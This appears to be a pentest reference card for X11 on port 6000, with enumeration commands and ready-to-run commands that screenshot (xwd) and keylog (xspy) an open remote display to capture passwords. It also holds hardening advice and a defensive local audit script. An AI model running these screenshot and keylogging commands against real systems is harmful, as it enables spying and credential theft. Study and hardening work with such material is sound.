X11
aka x-server
The X Window System display server on 6000+. With access control disabled (xhost +), a remote attacker can screenshot the desktop and log keystrokes — capturing passwords as they're typed.
Ports
| Port | Proto | Notes |
|---|---|---|
| 6000 | tcp | X11 display :0 |
Fingerprint
- nmap x11-access reports 'X server access is granted'
- xdpyinfo connects when access control is open
Key files
| Path | Holds | Sensitive |
|---|---|---|
| ~/.Xauthority | MIT-MAGIC-COOKIE for authenticated X access | sensitive |
Exploitation primitives
- Open access (xhost +) → connect with no auth
- Screenshot the live desktop (xwd) to see what the user is doing
- Keylog the session (xspy) to capture typed passwords
Overview
X11 on 6000 is the Linux GUI display server. If access control is open (xhost +), the display is yours — you can watch and key-log the user’s session.
Enumeration
Check whether access is open:
nmap -p6000 --script x11-access <TARGET>
Confirm with xdpyinfo:
xdpyinfo -display <TARGET>:0
Screenshot the desktop
xwd -root -display <TARGET>:0 -out screen.xwd && convert screen.xwd screen.png
Keylog the session
xspy <TARGET>:0
Hardening
Never use xhost +; require X authority cookies and tunnel X over SSH (ssh -X) instead of exposing 6000.
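A local audit for the two conditions in the hardening advice, as an added example that is not part of the original page: it classifies `xhost` output and lists X11 TCP listeners from `ss -tln` that are not bound to loopback. The function names, the display-number bound and the sample inputs are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: local audit helpers; names and sample data are constructed.
# Live use: xhost | xhost_state ; ss -tln | x11_tcp_listeners

# Classify `xhost` output on stdin: open | host-acl | restricted | unknown.
# "host-acl" = access control is on, but an INET/INET6 entry admits a whole
# host by address, with no cookie required.
xhost_state() {
  awk '
    /^access control disabled/ { off = 1 }
    /^access control enabled/  { enabled = 1 }
    /^INET6?:/                 { hosts = 1 }
    END {
      if (off)                   print "open"
      else if (enabled && hosts) print "host-acl"
      else if (enabled)          print "restricted"
      else                       print "unknown"
    }'
}

# Print X11 listeners (port 6000 + display number) from `ss -tln` output on
# stdin that are not bound to loopback. Max display 63 is an assumed bound.
x11_tcp_listeners() {
  awk -v max="${X11_MAX_DISPLAY:-63}" '
    $1 == "LISTEN" {
      n = split($4, p, ":"); port = p[n] + 0
      host = substr($4, 1, length($4) - length(p[n]) - 1)
      if (port >= 6000 && port <= 6000 + max &&
          host !~ /^127\./ && host != "[::1]") print $4
    }'
}

# Constructed samples: an open display on TCP, plus the loopback-only
# listener that sshd X11 forwarding typically creates (display :10).
SAMPLE_XHOST='access control disabled, clients can connect from any host
SI:localuser:alice'
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:6000       0.0.0.0:*
LISTEN 0      128    127.0.0.1:6010     0.0.0.0:*
LISTEN 0      128    [::]:6001          [::]:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*'

report() {  # $1 = xhost output, $2 = ss -tln output
  echo "xhost access control: $(printf '%s\n' "$1" | xhost_state)"
  exposed=$(printf '%s\n' "$2" | x11_tcp_listeners)
  if [ -n "$exposed" ]; then
    printf 'X11 reachable over TCP: %s\n' $exposed
  else
    echo "no non-loopback X11 TCP listener"
  fi
}
report "$SAMPLE_XHOST" "$SAMPLE_SS"
```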